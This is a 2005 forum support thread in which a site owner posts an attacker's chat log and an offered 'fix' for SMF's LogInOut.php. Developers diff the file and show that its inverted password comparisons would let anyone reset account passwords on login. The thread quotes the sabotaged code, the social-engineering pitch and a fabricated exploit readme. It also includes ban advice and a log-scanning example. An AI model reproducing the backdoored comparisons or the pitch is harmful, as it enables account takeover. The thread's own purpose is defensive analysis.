A hacker threatened me with this...

Started by stormbear, August 13, 2005, 10:10:28 AM


stormbear

I run hxxp:booksforsoldiers.com [nonactive] and am a frequent target of politically motivated hackers. I am running SMF 1.0.5.

I carefully downloaded the file he suggested and ultracarefully opened it. It appears to be a replacement for LogInOut.php that he "claims" he fixed.

Now, there is no way I am loading this of course, but can anyone tell me if this is a real threat?

The checked file is here...
hxxp:booksforsoldiers.com/bug_fix_folder.zip [nonactive]

Here is the transcript from one hacker claiming there is a security hole....
(12:48:28 AM) rational_hacker:  let me check out ur site
(12:48:36 AM) rational_hacker:  see if i find any vulnerable stuff
(12:48:43 AM) rational_hacker:  brb looking
(12:48:56 AM) Storm:  ::nod::
(1:00:52 AM) rational_hacker: 
(1:00:55 AM) rational_hacker:  i found a huge one
(1:01:09 AM) rational_hacker:  your login system is vulnerable
(1:01:13 AM) rational_hacker:  for your forum
(1:01:18 AM) Storm:  how do i fix it?
(1:01:24 AM) rational_hacker:  one sec, im trying to think on what to do
(1:04:20 AM) rational_hacker:  ok
(1:04:21 AM) rational_hacker:  well
(1:04:43 AM) rational_hacker:  i can fix the .php page and give it to you to re upload
(1:05:14 AM) Storm:  how do you want to send it to me?
(1:05:25 AM) rational_hacker:  ***** link deleted *****
(1:05:35 AM) Storm:  ::nod::
(1:05:43 AM) rational_hacker:  when u get it scan it of course
(1:05:45 AM) rational_hacker:  to make sure its safe
(1:05:52 AM) rational_hacker:  then let me know if u dont know how to use it
(1:06:01 AM) rational_hacker:  goes in /sources/
(1:06:05 AM) Storm:  nod
(1:06:33 AM) rational_hacker:  for the forum this is
(1:09:33 AM) Storm:  got it
(1:10:00 AM) Storm:  was the vulnerability you used last time phpBB related?
(1:10:11 AM) rational_hacker:  no
(1:10:13 AM) rational_hacker:  we used that one
(1:10:23 AM) rational_hacker:  but it was set for php
(1:10:46 AM) Storm:  But the SMF is new... post hack
(1:10:56 AM) rational_hacker:  i know
(1:10:59 AM) rational_hacker:  i just scanned it
(1:11:02 AM) rational_hacker:  and was able to get in
(1:11:06 AM) rational_hacker:  using operands
(1:11:19 AM) rational_hacker:  Exploit:

Incorrect operands may lead to account break-ins using certain symbols PHP uses to determine 'TRUE' or 'FALSE' (such as b:1)



Replace LogInOut.php with the provided LogInOut.php to install fix.



- SMF
(1:11:33 AM) rational_hacker:  and the exploit isnt new
(1:11:38 AM) rational_hacker:  it was just released

stormbear

Here are the differences in the two files...

ORIGINAL SMF
LogInOut.php
line 204
   if ($user_settings['passwd'] == crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] == md5($_REQUEST['passwrd']))

Modded SMF
LogInOut.php
line 204
   if ($user_settings['passwd'] != crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] != md5($_REQUEST['passwrd']))


ORIGINAL SMF
LogInOut.php
line 210
   elseif ($user_settings['passwordSalt'] != '' && ($user_settings['passwd'] == md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] == md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))

MODDED SMF
LogInOut.php
line 210
   elseif (($user_settings['passwd'] != md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] != md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))

ORIGINAL SMF
LogInOut.php
line 217
   elseif ($user_settings['passwd'] != $md5_passwrd)


MODDED SMF
LogInOut.php
line 217
   elseif ($user_settings['passwd'] == $md5_passwrd)

Tristan Perry

#2
It's changed:

// Old style encryption... now's the only time to fix it.
if ($user_settings['passwd'] == crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] == md5($_REQUEST['passwrd']))
{
updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\''));
$user_settings['passwd'] = $md5_passwrd;
}
// What about if the user has come from vBulletin or Invision?  Let's welcome them with open arms \o/.
elseif ($user_settings['passwordSalt'] != '' && ($user_settings['passwd'] == md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] == md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))
{
// Get our new encryption in!
updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\'', 'passwordSalt' => '\'\''));
$user_settings['passwd'] = $md5_passwrd;
}
// Bad password!  Thought you could fool the database?!
elseif ($user_settings['passwd'] != $md5_passwrd)
{


To:

// Old style encryption... now's the only time to fix it.
if ($user_settings['passwd'] != crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] != md5($_REQUEST['passwrd']))
{
updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\''));
$user_settings['passwd'] = $md5_passwrd;
}
// What about if the user has come from vBulletin or Invision?  Let's welcome them with open arms \o/.
elseif (($user_settings['passwd'] != md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] != md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))
{
// Get our new encryption in!
updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\'', 'passwordSalt' => '\'\''));
$user_settings['passwd'] = $md5_passwrd;
}
// Bad password!  Thought you could fool the database?!
elseif ($user_settings['passwd'] == $md5_passwrd)
{


It looks like people wouldn't be able to log in anymore. If the person entered a legitimate password, they'd be shown a "Wrong password" message and wouldn't be logged in. Would probably give the impression that your forum has been hacked or something.

Obvious enough, although don't use that script!

stormbear

trust me... not using this. But I do need to know if there is actually a vulnerability...

Tristan Perry

Quote from: stormbear on August 13, 2005, 10:43:25 AM
trust me... not using this. But I do need to know if there is actually a vulnerability...
I think that it'd block legitimate login requests, and log in someone who uses a wrong password. So yes, it'd be a vulnerability.

Chris Cromer

There isn't a vulnerability in login currently. But if you upload that script he gave you it would cause problems.

That guy is just blowing smoke, and is trying to trick you into messing up your own forum.
Chris Cromer

"I was here, here I was, was I here, sure I was" - The little voice in my head.

stormbear

Here is the content of his readme
----------
Exploit:
Incorrect operands may lead to account break-ins using certain symbols PHP uses to determine 'TRUE' or 'FALSE' (such as b:1)

Replace LogInOut.php with the provided LogInOut.php to install fix.

- SMF
----------

Tristan Perry

#7
It's not true; SMF 1.0.5 hasn't had any reported security vulnerabilities as far as I know. Ignore it. :) Looking into things further. This wouldn't create any vulnerabilities, although people would no longer be able to log in.

A cookie would be set, although when SMF authorizes the cookie it'd pick up that something isn't right.

Chris Cromer

The content of his readme was made up by him. There are no security reports on this.

stormbear

Here are his logs from last night (via tracking on SMF tracking tool)

IP address
Display name
Message
Date

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:05:22 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:05:45 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:05:51 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:05:51 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:06:01 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:06:16 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:06:16 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:06:37 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:06:46 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:06:51 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:07:24 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:07:32 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:07:40 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:07:45 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:08:10 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=register
Today at 05:08:44 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/Register.template.php (eval?)
Line: 454
?action=register2
Today at 05:09:14 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:09:18 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:09:24 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:09:56 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:09:56 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:10:04 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/Profile.template.php (eval?)
Line: 454
?action=profile;u=23487
Today at 05:10:12 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:10:18 AM

212.162.130.82
Guest
Your email address needs to be validated before you can login. - Reina
?action=login2
Today at 05:10:22 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:10:22 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:11:03 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:11:25 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:11:43 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:11:48 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:11:48 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:12:55 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:12:55 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Profile.english.php (eval?)
Line: 454
?action=reminder
Today at 05:14:13 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/BoardIndex.template.php (eval?)
Line: 454
Today at 05:14:25 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login
Today at 05:14:47 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:14:51 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:14:51 AM

212.162.130.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:19:23 AM

212.162.130.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /home/virtual/site4/fst/var/www/html/forum/Themes/desertsand_small/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:19:23 AM

stormbear


Chris Cromer

From the look of those logs, it looks like he was trying to exploit that script he told you to upload. But since you didn't upload that file, he failed to get into your account.

If possible ban him.

Oldiesmann

The most he would have been able to do is delete everyone's posts (by logging in as each user, one at a time) and change a bunch of non-critical profile settings, but that's about it. It is a security risk, but unless he knew your password, it would have taken more than that to get into the admin center (even if you've got admin security disabled, which is a bad idea unless you're using SMF on your own personal test machine that can't be accessed from outside your local area network...).

First, ban this idiot through SMF - if there aren't any other users with IP addresses that are close to his, ban everything between 212.162.130.0 and 212.162.130.255 (enter the IP address as 212.162.130.0-255 to accomplish this).

Then, ban that same range of IPs through .htaccess, like so:

# Allow everyone, then deny the one range (Deny wins under "Order Allow,Deny")
Order Allow,Deny
Allow from all
Deny from 212.162.130.0/24


To create a .htaccess file, open up Notepad and put that code in the document, then save it and upload it to /var/www/html. Windows will save it as .htaccess.txt by default - so either select "All Files" from the "Type:" list in the "Save" dialog box, or just rename it after you upload it.

The .htaccess method will prevent him from being able to access anything on your server. Instead of seeing what he wants, he'll just get hit with a "403 forbidden" message...

Fizzy

When you ban him on the IP number, watch out in the error log for other IPs attempting the same thing. He may have used a spoofed or proxied IP.
"Reality is merely an illusion, albeit a very persistent one." - A.E.
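
Added example (not part of the original thread, and not SMF code): one way to follow the advice above and watch the error log for other addresses attempting the same thing after a range has been banned, assuming the log has been saved as text in the layout stormbear pasted. The sample entries, the documentation-range IPs and the function names are constructed for illustration.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample in the layout of the error log pasted in this thread
# (IP, display name, message, optional File/Line/URL lines, date).
SAMPLE_LOG = """\
192.0.2.82
Guest
Password incorrect - StormBear
?action=login2
Today at 05:05:51 AM

192.0.2.82
Guest
8: Use of undefined constant Join - assumed 'Join'
File: /forum/Themes/example/languages/Login.english.php (eval?)
Line: 454
?action=login2
Today at 05:05:51 AM

198.51.100.7
Guest
Password incorrect - StormBear
?action=login2
Today at 06:40:02 AM

198.51.100.7
Guest
Password incorrect - StormBear
?action=login2
Today at 06:40:31 AM

203.0.113.5
Guest
Password incorrect - Reina
?action=login2
Today at 07:15:09 AM
"""

FAILED = re.compile(r"^Password incorrect - (?P<account>.+)$")

def failed_logins(log_text):
    """Yield (ip, account) for every 'Password incorrect' entry."""
    for block in re.split(r"\n\s*\n", log_text.strip()):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        try:
            ip = ipaddress.ip_address(lines[0])
            m = FAILED.match(lines[2])
        except (ValueError, IndexError):
            continue  # malformed or truncated entry
        if m:
            yield ip, m.group("account")

def new_sources(log_text, banned_range, threshold=2):
    """IPs outside the banned range that keep failing on accounts the
    banned range already went after."""
    banned = ipaddress.ip_network(banned_range)
    events = list(failed_logins(log_text))
    targeted = {acct for ip, acct in events if ip in banned}
    hits = Counter((str(ip), acct) for ip, acct in events
                   if ip not in banned and acct in targeted)
    return sorted((ip, acct, n) for (ip, acct), n in hits.items() if n >= threshold)

if __name__ == "__main__":
    for ip, acct, n in new_sources(SAMPLE_LOG, "192.0.2.0/24"):
        print(f"{ip}: {n} failed logins against {acct}")
```

The PHP notice entries are skipped because only the message line is matched, and a single mistyped password against an account the banned range never touched is not reported.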


[Unknown]

#14
        // Old style encryption... now's the only time to fix it.
-       if ($user_settings['passwd'] == crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] == md5($_REQUEST['passwrd']))
+       if ($user_settings['passwd'] != crypt($_REQUEST['passwrd'], substr($_REQUEST['passwrd'], 0, 2)) || $user_settings['passwd'] != md5($_REQUEST['passwrd']))
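
Review bot: The condition on the "+" line, passwd != crypt(...) || passwd != md5(...), is true for any submitted password, because the stored value can match at most one of two hashes with different formats, so the branch it guards no longer depends on the password being right. Keep the original "==" comparisons; a negated test joined with "||" can never express "matches one of the legacy hashes".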


This will make it so that if the person trying to log in gets their password wrong, it will reset it to the password typed.

For example, if your username is "admin" and your password is "admin", and the hacker (with this NEW code) tries to log in with "admin" and "test", your password will be changed to "test".

Clearly, this change is what the would-be hacker script kiddie is hoping you'll make.  He'd probably be ecstatic if we made a new release with that change.

        // What about if the user has come from vBulletin or Invision?  Let's welcome them with open arms \o/.
-       elseif ($user_settings['passwordSalt'] != '' && ($user_settings['passwd'] == md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] == md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))
+       elseif (($user_settings['passwd'] != md5(md5($_REQUEST['passwrd']) . $user_settings['passwordSalt']) || $user_settings['passwd'] != md5(md5($user_settings['passwordSalt']) . md5($_REQUEST['passwrd']))))
        {
                // Get our new encryption in!
                updateMemberData($user_settings['ID_MEMBER'], array('passwd' => '\'' . $md5_passwrd . '\'', 'passwordSalt' => '\'\''));
                $user_settings['passwd'] = $md5_passwrd;
        }
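
Review bot: The "+" line drops the $user_settings['passwordSalt'] != '' guard and negates both comparisons under "||", so the condition holds for accounts that never had a salt and for any submitted password, while the unchanged body still writes $md5_passwrd into passwd through updateMemberData() and clears passwordSalt. Restore the guard and the "==" comparisons so the stored hash is rewritten only after the legacy salted hash has matched.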


This does exactly the same thing.  Since the first change already "fixed" that you can't change people's passwords on log in, changing it here has no real effect (except perhaps making it look more authentic to people who don't know PHP?)

        // Bad password!  Thought you could fool the database?!
-       elseif ($user_settings['passwd'] != $md5_passwrd)
+       elseif ($user_settings['passwd'] == $md5_passwrd)
        {
                // They've messed up again - keep a count to see if they need a hand.
                if (isset($_SESSION['failed_login']))
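
Review bot: The "+" line flips the failure test to "==", so the block commented "Bad password!" and its $_SESSION['failed_login'] counting run only when the stored hash matches, and a mismatch falls past this elseif without being rejected or counted. Keep "!=" here; this check has to fail closed on any mismatch.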


That's quite funny.  There, it won't say you got a bad password unless your password was correct.  Silly, isn't it?

DO NOT apply that change, whatever you do.  Without the changed file, your installation is secure.  With it, YOU WILL GET HACKED.  I suggest deleting the file, and reporting this person to the proper authorities (abuse for his email account, whatever messenger you were talking to him on, etc.)

-[Unknown]

Oldiesmann

Whoops... Wasn't paying attention there... Good thing you didn't listen to him. Seems he could have done a lot more damage than I thought.

Thunderace

#16
Please do report him... we don't need idiots like this to feel they can roam and attack freely.

Here it's virtually impossible as people know their stuff... but just think of those who have no code skills at all! SMF is perfectly designed for them as it's so easy. This @#!! will be roaming the net to find such a person.

Also the security reputation of SMF will give him kudos, which I imagine is what he's after.

stormbear

I love you guys....


Thanks so much for all the help.

You have no idea what we have been through this year.

Storm Williams
Founder
BFS

Fizzy

You did the right thing in bringing this problem to the Dev experts :)

